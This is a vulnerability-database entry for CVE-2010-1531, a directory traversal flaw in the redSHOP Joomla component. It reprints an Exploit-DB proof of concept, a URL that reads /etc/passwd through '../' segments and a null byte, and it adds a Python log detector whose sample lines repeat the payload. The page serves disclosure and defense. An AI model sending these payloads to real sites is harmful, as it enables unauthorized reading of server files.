CVE-2010-1531

Severity: high
Published 2010-04-26 · Modified 2026-04-29
VIR risk: 8.5

Description

Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.

Predictions

Exploit likelihood: 20%
Patch ETA: none given
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12054 · webapps · php · verified · text · 2 KB
Author: NoGe · 2010-04-04

Joomla! Component redSHOP 1.0 - Local File Inclusion

Source: Exploit-DB
======================================================================================================================


  [o] Joomla Component redSHOP Local File Inclusion Vulnerability
 
       Software : com_redshop version 1.0.x [ commercial ]
       Vendor   : http://redcomponent.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


======================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_redshop&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00


======================================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


======================================================================================================================


  [o] Public Service Announcement

       -irc.******.net- *** Notice -- ander used SAJOIN to make wishnusakti join #channel
       <Jack> whoa
       <Jack> what are you two doing in here?
       <Jack> tsk tsk tsk
       <@ander> mafia business
       <@wishnusakti> studying, bro ;))
       <@wishnusakti> I'm a newbie :(
       <Jack> same here, bro
       <Jack> let me join, okay
       <Jack> please guide me, elders
       <@wishnusakti> see, ander-wear is the one teaching me
       <@wishnusakti> ask him, brooo
       <Jack> ok bro
       <Jack> bro ander-wear.. teach me please
       <@wishnusakti> don't call him that
       <@wishnusakti> he'll pull your pants down later, broo =))
       <Jack> so what should I call him then?
       <@wishnusakti> my darling ander :*
       <~zxvf> [06:27] * ~ander is listening to [Akon - Right Now (Na Na Na)] © [nob0dy] <=- looks like he's in a good mood
       <&pizzy> he's lovestruck
       <&NoGe> he's all giddy
       <zxvf> I see, I see

       ooh ooh, you've been caught out... wkakwakwkakwkwakwak... :p


======================================================================================================================
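A detection-side example, added here and not code from the Exploit-DB posting, the CVE record or the redSHOP project: it scans constructed Apache-style access-log lines for a `view` parameter whose percent-decoded value is not a plain identifier, which covers the raw `../` form and the trailing `%00` from the PoC above as well as double percent-encoding. The log lines, function names and sample addresses are this example's own assumptions.

```python
"""Access-log detection for directory traversal in a `view` parameter.

Added example for CVE-2010-1531; not code from the Exploit-DB posting,
the CVE record or the redSHOP project. The log lines are constructed samples.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache common-log shape, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [26/Apr/2010:10:01:02 +0000] "GET /index.php?option=com_redshop&view=product HTTP/1.1" 200 5120
203.0.113.9 - - [26/Apr/2010:10:01:05 +0000] "GET /index.php?option=com_redshop&view=../../../../../../etc/passwd%00 HTTP/1.1" 200 1843
203.0.113.9 - - [26/Apr/2010:10:01:09 +0000] "GET /index.php?option=com_redshop&view=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843
203.0.113.11 - - [26/Apr/2010:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=4 HTTP/1.1" 200 9000
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# A legitimate view name is an identifier: letters, digits and underscore only.
SAFE_VIEW_RE = re.compile(r"[A-Za-z0-9_]+")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded sequences such as %252f unwrap."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_unsafe_view(raw_view: str) -> bool:
    """True when the decoded value carries a NUL byte, a path separator or a
    '..' segment, or is otherwise not a plain identifier."""
    view = decode_fully(raw_view)
    if "\x00" in view or "/" in view or "\\" in view or ".." in view:
        return True
    return SAFE_VIEW_RE.fullmatch(view) is None


def query_params(target: str) -> list[tuple[str, str]]:
    """Split the query string without decoding, so the raw value can be reported."""
    params = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((key, value))
    return params


def find_traversal_attempts(log_text: str, param: str = "view") -> list[tuple[str, str]]:
    """Return (client_ip, raw_value) for each request whose `param` fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for key, value in query_params(m.group("target")):
            if key == param and is_unsafe_view(value):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: view={value}")
```

The same identifier allowlist is the server-side fix for this class of bug: a component that maps a `view` parameter to a file path should reject anything that is not a bare identifier before building the path, rather than trying to strip `..` sequences after the fact.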

Application impact

Vendor         Product       Versions   Fixed
redcomponent   com_redshop   1.0
redcomponent   com_redshop   1.0.1
redcomponent   com_redshop   1.0.2
redcomponent   com_redshop   1.0.3
redcomponent   com_redshop   1.0.4
redcomponent   com_redshop   1.0.5
redcomponent   com_redshop   1.0.6
redcomponent   com_redshop   1.0.7
redcomponent   com_redshop   1.0.8
redcomponent   com_redshop   1.0.9
redcomponent   com_redshop   1.0.10
redcomponent   com_redshop   1.0.11
redcomponent   com_redshop   1.0.12
joomla         joomla\!

References

CWEs

CWE-22 (Path Traversal)
